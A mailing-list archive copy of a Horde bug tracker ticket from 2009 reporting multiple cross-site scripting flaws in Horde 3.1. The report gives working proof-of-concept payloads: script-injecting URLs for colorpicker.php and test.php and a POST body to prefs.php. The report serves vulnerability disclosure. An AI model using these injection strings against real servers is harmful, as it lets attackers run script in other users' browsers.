Horde
 » 
Horde - Bugs

 « Return to Thread: [Tickets #8399] Multiple Cross Site Scripting Vulnerabilities

[Tickets #8399] Multiple Cross Site Scripting Vulnerabilities

by bugs-14 :: Rate this Message:

Reply (Restricted by the Administrator) | Reply to Author | View in Thread

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: http://bugs.horde.org/ticket/8399
------------------------------------------------------------------------------
  Ticket             | 8399
  Created By         | security@...
  Summary            | Multiple Cross Site Scripting Vulnerabilities
  Queue              | Horde Base
  Version            | 3.1
  Type               | Bug
  State              | Unconfirmed
  Priority           | 2. Medium
  Milestone          |
  Patch              |
  Owners             |
------------------------------------------------------------------------------


security@... (2009-07-03 14:48) wrote:

Multiple cross site scripting vulnerabilites exist.  Proof of concepts:

http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>

https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["

https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>

POST to http://hordeserver.com/horde/services/prefs.php with the  
following content:

actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on





--
You are subscribed to this list as: lists@...
To unsubscribe, mail: bugs-unsubscribe@...

 « Return to Thread: [Tickets #8399] Multiple Cross Site Scripting Vulnerabilities

Free embeddable forum powered by Nabble Forum Help